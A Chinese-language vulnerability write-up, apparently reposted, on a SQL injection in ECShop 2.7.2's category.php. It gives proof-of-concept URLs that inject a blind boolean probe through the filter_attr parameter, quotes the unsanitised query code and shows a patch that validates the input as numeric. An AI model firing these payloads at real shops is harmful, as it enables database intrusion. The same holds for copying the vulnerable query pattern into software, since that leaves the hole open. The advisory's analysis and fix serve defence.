1. 漏洞描述
Relevant Link:
http: // sebug.net/vuldb/ssvid-19574
2. 漏洞触发条件
0x1: POC
http: // localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 http: // localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=145%20or%201=2
3. 漏洞影响范围
4. 漏洞代码分析
/category.php
..
$filter_attr_str = isset($_REQUEST[ ‘ filter_attr ‘ ]) ? trim($_REQUEST[ ‘ filter_attr ‘ ]) : ‘ 0 ‘ ;
// 变量 $filter_attr_str 是以[.] 分开的数组
$filter_attr = empty($filter_attr_str) ? ‘‘ : explode( ‘ . ‘ , trim($filter_attr_str));
..
/* 扩展商品查询条件 */
if (! empty($filter_attr))
{
$ext_sql = " SELECT DISTINCT(b.goods_id) FROM " . $ecs->table( ‘ goods_attr ‘ ) . " AS a, " . $ecs->table( ‘ goods_attr ‘ ) . " AS b " . " WHERE " ;
$ext_group_goods = array();
foreach ($filter_attr AS $k => $v) // 查出符合所有筛选属性条件的商品id */
{
if ($v != 0 )
{
// $v 没有作任何处理就加入了SQL查询,造成SQL注入
$sql = $ext_sql . " b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] . " AND a.goods_attr_id = " . $v;
..
5. 防御方法
/category.php
..
/* 对用户输入的$_REQUEST[‘filter_attr‘]进行转义 */
$filter_attr_str = isset($_REQUEST[ ‘ filter_attr ‘ ]) ? htmlspecialchars(trim($_REQUEST[ ‘ filter_attr ‘ ])) : ‘ 0 ‘ ;
/* */
$filter_attr_str = trim(urldecode($filter_attr_str));
/* 敏感关键字过滤 */
$filter_attr_str = preg_match( ‘ /^[\d\.]+$/ ‘ ,$filter_attr_str) ? $filter_attr_str : ‘‘ ;
/**/
$filter_attr = empty($filter_attr_str) ? ‘‘ : explode( ‘ . ‘ , $filter_attr_str);
..
foreach ($filter_attr AS $k => $v) // 查出符合所有筛选属性条件的商品id */
{
/* is_numeric($v) */
if (is_numeric($v) && $v != 0 )
{
..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
ecshop /category.php SQL Injection Vul
标签:
查看更多关于ecshop /category.php SQL Injection Vul的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did160757